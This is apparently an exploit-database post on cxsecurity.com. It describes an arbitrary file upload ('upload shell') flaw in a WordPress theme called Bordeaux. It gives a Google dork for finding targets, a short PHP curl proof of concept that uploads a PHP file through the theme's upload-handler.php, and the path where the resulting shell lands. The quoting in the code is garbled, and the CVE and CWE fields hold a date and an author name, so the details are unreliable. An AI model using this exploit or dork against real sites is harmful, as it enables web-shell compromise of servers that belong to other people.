Wordpress pulgin bordeaux theme upload shell Vulnerability

2016.09.17
dk Saman.khan (DK) dk
Risk: Medium
Local: No
Remote: Yes
CVE: 2016-09-14
CWE: Saman-Khan
Dork: inurl:/wp-content/themes/bordeaux-theme/

########################## # Exploit Title: wordpress pulgin bordeaux theme upload shell Vulnerability # Google Dork : inurl:/wp-content/themes/bordeaux-theme/ # We Are Iranian Anonymous # Home: Iranonymous.org # Discovered By: Hacker Khan # Tested on : Windows # Version: all ########################## # Poc : <?php $uploadfile="upload.php"; $ch = curl_init("http://127.0.0.1/wp-content/themes/bordeaux-theme/functions/upload-handler.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('orange_themes'=>-@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print -$postResult"; ?> ########################## http://127.0.0.1/wordpress/wp-content/uploads/2016/09/upload.php ################################### #Thanks to : MR.Khatar || ll_azab-siyah_ll || Blackwolf_Iran ||Ormazd ||Sh@d0w ||mohammad Pn ||Shdmehr || And All Of Iranian Anonymous . # Discovered By: Hacker Khan


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top